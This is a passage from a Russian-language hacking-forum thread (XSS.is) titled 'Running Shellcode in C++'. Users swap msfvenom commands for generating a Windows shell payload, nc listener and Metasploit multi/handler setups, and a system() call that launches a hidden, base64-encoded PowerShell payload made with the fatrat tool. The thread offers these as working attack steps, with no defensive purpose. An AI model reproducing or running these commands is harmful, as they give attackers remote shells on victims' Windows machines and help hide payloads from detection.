• XSS.stack #1 – первый литературный журнал от юзеров форума

Running Shellcode in C++

Пожалуйста, обратите внимание, что пользователь заблокирован
You will never get a reverse shell without specifying the LHOST!
hahahaha

Just type this on the keyboard my love!

- ifconfig

- msfvenom -p windows/shell_bind_tcp LHOST=10.Your.Ip.199 LPORT=80 -f c

- nc -lnvp 80

or you can use multihandler

msfconsole
use exploit/multi/handler
set payload windows/shell_bind_tcp
set lhost 10.Your.Ip.199
set set ExitOnSession false
set lport 80
exploit -j
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Never-mind him, he's a little lost 😅
Could you be more specific in your comment?

It seems disrespectful

If there is something wrong with what I said, could you correct it?
 
If there is something wrong with what I said, could you correct it?
1. windows/shell_bind_tcp is not a reverse shell. Its a bind shell (duh).
2. Bind shell works without LHOST just fine.
3. Everything already discussed in this topic.

1665559223720.png


1665559233055.png
 
Shellcodes seem alot of work
What if i used this instead? (generated by fatrat)
system("powershell -window hidden -EncodedCommand JABmAFMAdQAgAD0AIAAnACQARgBwAGQAIAA...")

Is it a bad idea, and why
hey man, have you used all of the fatrat features? what are its special ones?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
did you set the LHOST="your ip" and specify the architecture of the reverse shell
you don't need LHOST for bind
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх